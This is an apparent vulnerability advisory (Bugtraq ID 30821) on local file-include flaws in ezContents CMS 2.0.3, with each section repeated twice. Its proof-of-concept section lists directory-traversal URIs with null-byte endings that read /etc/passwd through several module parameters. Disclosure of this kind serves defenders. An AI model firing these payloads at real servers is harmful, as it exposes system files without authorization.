ezContents CMS Multiple Local File Include Vulnerabilities
BID:30821
Info
ezContents CMS Multiple Local File Include Vulnerabilities
| Bugtraq ID: | 30821 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-7055 CVE-2008-7054 |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 25 2008 12:00AM |
| Updated: | Jul 05 2016 10:01PM |
| Credit: | DSecRG |
| Vulnerable: |
VisualShapers ezContents 2.0.3 |
| Not Vulnerable: | |
Discussion
ezContents CMS Multiple Local File Include Vulnerabilities
ezContents CMS is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these issues using directory-traversal strings to view local files within the context of the webserver process. Information harvested may aid in further attacks.
ezContents CMS 2.0.3 is vulnerable; other versions may also be affected.
ezContents CMS is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these issues using directory-traversal strings to view local files within the context of the webserver process. Information harvested may aid in further attacks.
ezContents CMS 2.0.3 is vulnerable; other versions may also be affected.
Exploit / POC
ezContents CMS Multiple Local File Include Vulnerabilities
Attackers can exploit these issues using a browser.
The following proof-of-concept URIs are available:
http://www.example.com/[installdir]/module.php?link=....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
http://www.example.com/[installdir]/modules/diary/showdiary.php?rootdp=DSecRG&gsLanguage=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/modules/diary/showdiary.php?rootdp=DSecRG&gsLanguage=DSecRG&language_home=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/modules/diary/showdiary.php?rootdp=DSecRG&gsLanguage=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/modules/diary/showdiary.php?rootdp=DSecRG&gsLanguage=DSecRG&language_home=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/modules/diary/showdiarydetail.php?rootdp=DSecRG&admin_home=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/modules/diary/showdiarydetail.php?rootdp=DSecRG&gsLanguage=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/modules/diary/showdiarydetail.php?rootdp=DSecRG&language_home=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/modules/diary/submit_diary.php?rootdp=DSecRG&gsLanguage=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/modules/diary/submit_diary.php?rootdp=DSecRG&language_home=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/modules/news/news_summary.php?rootdp=DSecRG&admin_home=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/modules/news/inlinenews.php?rootdp=DSecRG&nLink=../../../../../../../../../../../../../etc/passwd%00/
http://www.example.com/[installdir]/modules/news/inlinenews.php?rootdp=DSecRG&gsLanguage=../../../../../../../../../../../../../etc/passwd%00
Attackers can exploit these issues using a browser.
The following proof-of-concept URIs are available:
http://www.example.com/[installdir]/module.php?link=....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
http://www.example.com/[installdir]/modules/diary/showdiary.php?rootdp=DSecRG&gsLanguage=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/modules/diary/showdiary.php?rootdp=DSecRG&gsLanguage=DSecRG&language_home=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/modules/diary/showdiary.php?rootdp=DSecRG&gsLanguage=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/modules/diary/showdiary.php?rootdp=DSecRG&gsLanguage=DSecRG&language_home=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/modules/diary/showdiarydetail.php?rootdp=DSecRG&admin_home=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/modules/diary/showdiarydetail.php?rootdp=DSecRG&gsLanguage=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/modules/diary/showdiarydetail.php?rootdp=DSecRG&language_home=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/modules/diary/submit_diary.php?rootdp=DSecRG&gsLanguage=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/modules/diary/submit_diary.php?rootdp=DSecRG&language_home=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/modules/news/news_summary.php?rootdp=DSecRG&admin_home=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/modules/news/inlinenews.php?rootdp=DSecRG&nLink=../../../../../../../../../../../../../etc/passwd%00/
http://www.example.com/[installdir]/modules/news/inlinenews.php?rootdp=DSecRG&gsLanguage=../../../../../../../../../../../../../etc/passwd%00
Solution / Fix
ezContents CMS Multiple Local File Include Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
ezContents CMS Multiple Local File Include Vulnerabilities
References:
References:
- ezContent CMS Homepage (VisualShapers)
- [DSECRG-08-038] Multiple Local File Include Vulnerabilities in ezContents CMS 2. (Digital Security Research Group \[DSecRG\]